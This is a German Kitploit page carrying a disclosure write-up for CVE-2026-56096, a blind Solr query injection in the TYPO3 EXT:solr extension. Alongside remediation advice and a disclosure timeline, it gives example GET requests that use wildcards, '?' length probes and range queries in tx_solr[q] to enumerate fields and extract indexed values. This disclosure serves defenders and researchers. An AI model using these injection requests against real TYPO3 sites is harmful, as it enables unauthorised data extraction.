Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-56096 — Proof of Concept und technischer Write-up für CVE-2026-56096, eine blinde Solr-Query-Injection in TYPO3 EXT:solr, die unauthentifizierte Feld-Enumeration und Datenextraktion ermöglicht. | Kitploit
Tools/GitHubGitHub/yairhinkis/cve-2026-56096
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPapers & Forschung
GitHubyairhinkis/cve-2026-56096

CVE-2026-56096

Proof of Concept und technischer Write-up für CVE-2026-56096, eine blinde Solr-Query-Injection in TYPO3 EXT:solr, die unauthentifizierte Feld-Enumeration und Datenextraktion ermöglicht.

Repository anzeigen
vor 9h 54mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-56096: Solr Query Injection & Blind Data Extraction in TYPO3 EXT:solr

Eine architektonische Sicherheitslücke wurde in der offiziellen TYPO3 Apache Solr-Erweiterung (EXT:solr / apache-solr-for-typo3/solr) entdeckt. Das Problem ermöglicht nicht authentifizierten Remote-Angreifern, beliebige Solr/Lucene-Abfragesyntax über den Suchparameter tx_solr[q] einzuschleusen, was eine unbefugte blinde Feldaufzählung und vollständige Metadatenextraktion aus dem Suchindex ermöglicht.


Metadaten

  • CVE-ID: CVE-2026-56096
  • Schwachstellentyp: CWE-943: Unsachgemäße Neutralisierung spezieller Elemente in der Datenabfragelogik
  • Zielkomponente: EXT:solr (Suchparameter: tx_solr[q])
  • CVSS v4.0 Score: 6.3 (Mittel) — CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
  • Forscher: Yair Hinkis

  • Schwachstellenübersicht

    Die Erweiterung EXT:solr akzeptiert benutzerseitig bereitgestellte Suchbegriffe über den Parameter tx_solr[q] und leitet diese an die Apache Solr-Engine weiter. Konstruktionsbedingt erlaubt die Erweiterung bestimmte Abfrageoperatoren – wie Wildcards (*), Einzelzeichen-Wildcards (?), Feldselektoren (:) und Bereichsabfragen ([a TO z]) –, um legitime Funktionalität wie facettierte Filterung zu unterstützen.

    Da diese Zeichen direkt an die Backend-Abfragekonstruktion übergeben wurden, ohne eine durchsetzende Whitelist oder Abstraktionsschicht für Abfragen, kann ein Angreifer feldspezifische Syntax bereitstellen, um die beabsichtigten Suchgrenzen zu umgehen. Dies ermöglicht nicht authentifizierten Benutzern, interne Solr-Felder direkt abzufragen und Indexdaten mithilfe boolean-basierter blinder Techniken zu extrahieren.


    Angriffstechniken

    1. Feldaufzählung über field:*

    Durch Anhängen einer Wildcard an einen beliebigen oder vermuteten Feldnamen kann ein Angreifer überprüfen, ob das Feld im Schema existiert:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:* HTTP/1.1
    Host: target.example.com
    
    

    Wenn das Feld existiert, verarbeitet Solr die Abfrage über alle übereinstimmenden Datensätze (was oft unterschiedliche Antwortcodes oder volumenbezogene Verhaltensweisen auslöst), was eine automatisierte wortlistenbasierte Feldaufzählung ermöglicht.


    2. Blinde Wertextraktion über Präfix-Wildcards

    Angreifer können sensible Feldwerte Zeichen für Zeichen mithilfe boolescher Inferenz extrahieren:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:a* HTTP/1.1  --> Liefert Suchtreffer (Wert beginnt mit 'a')
    GET /search?tx_solr[q]=siteHash:b* HTTP/1.1  --> "Nothing found" (Wert beginnt nicht mit 'b')
    
    

    3. Längenerkennung über den ?-Operator

    Der Einzelzeichen-Wildcard-Operator (?) kann die exakte Länge einer gespeicherten Zeichenkette bestimmen, bevor mit der Zeicheniteration begonnen wird:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:????????????* HTTP/1.1   (Prüft auf 12+ Zeichen)
    GET /search?tx_solr[q]=siteHash:?????????????* HTTP/1.1  (Prüft auf 13+ Zeichen)
    
    

    4. Beschleunigte Bereichsabfragen ([a TO z])

    Bereichsabfragen ermöglichen eine binäre Suchextraktion auf dem Anfangszeichen, wodurch die benötigten Anfragen von 26 auf ~5 pro Zeichenposition reduziert werden:

    root@kitploit:~
    GET /search?tx_solr[q]=siteHash:[a TO m] HTTP/1.1  --> Bestimmt, ob das Zeichen im Bereich 'a'-'m' liegt
    GET /search?tx_solr[q]=siteHash:[n TO z] HTTP/1.1  --> Bestimmt, ob das Zeichen im Bereich 'n'-'z' liegt
    
    

    Die Kombination von Längenerkennung, Bereichsabfragen und Präfix-Wildcards ermöglicht eine vollständige Feldextraktion mit minimalem Anfrageaufwand.


    Auswirkungen

    • Vertraulichkeitsverletzung: Vollständige Extraktion aller in Apache Solr indizierten Felder (z. B. interne System-Hashes, versteckte Seiteninhalte, benutzerbezogene Metadaten und Systemidentifikatoren).
    • Umgehung der Zugriffskontrolle: Umgeht Frontend-Suchfilter und TypoScript-Anzeigebeschränkungen.
    • Umfang: Betraf alle Standardinstallationen, die den EXT:solr-Suchendpunkt verwenden.

    Behebung

    Eine globale Zeichenmaskierung ist unzureichend, da Operatoren wie * und : beabsichtigte Suchfunktionen erfüllen. Die Behebung erfordert eine Whitelist und ein Parsing-Modell auf Anwendungsebene:

    1. Benutzerseitig bereitgestellte Abfragezeichenketten in einen Abstract Syntax Tree (AST) parsen, bevor sie an die Solr-Engine übergeben werden.
    2. Strikte Allowlists für zulässige Feldziele durchsetzen und direkte Benutzerabfragen gegen interne oder eingeschränkte Felder untersagen.
    3. Missbrauch nicht auf der Whitelist stehender Operatoren neutralisieren, der aus nicht vertrauenswürdigen Eingabekontexten stammt.

    Zeitplan der koordinierten Offenlegung

    • 6. März 2026: Schwachstelle während einer autorisierten Bewertung identifiziert; erste Benachrichtigung des Anbieters.
    • 17. April 2026: Anbieter implementierte lokale Edge-Mitigationen; bestätigte die Natur als Upstream-Bug.
    • 8. Mai 2026: Formeller Schwachstellenbericht an das TYPO3-Sicherheitsteam ([email protected]) übermittelt.
    • 15. Juni 2026: TYPO3-Sicherheitsteam bestätigte die Reproduktion und initiierte die Patch-Entwicklung mit den Erweiterungsbetreuern.
    • 25. August 2026: Offizielles Sicherheitsbulletin veröffentlicht, Patch publiziert und CVE-2026-56096 zugewiesen.

    Referenzen

    • TYPO3-Sicherheitshinweis: TYPO3-EXT-SA-2026-025
    • CWE-Definition: CWE-943: Unsachgemäße Neutralisierung spezieller Elemente in der Datenabfragelogik
    Tool herunterladen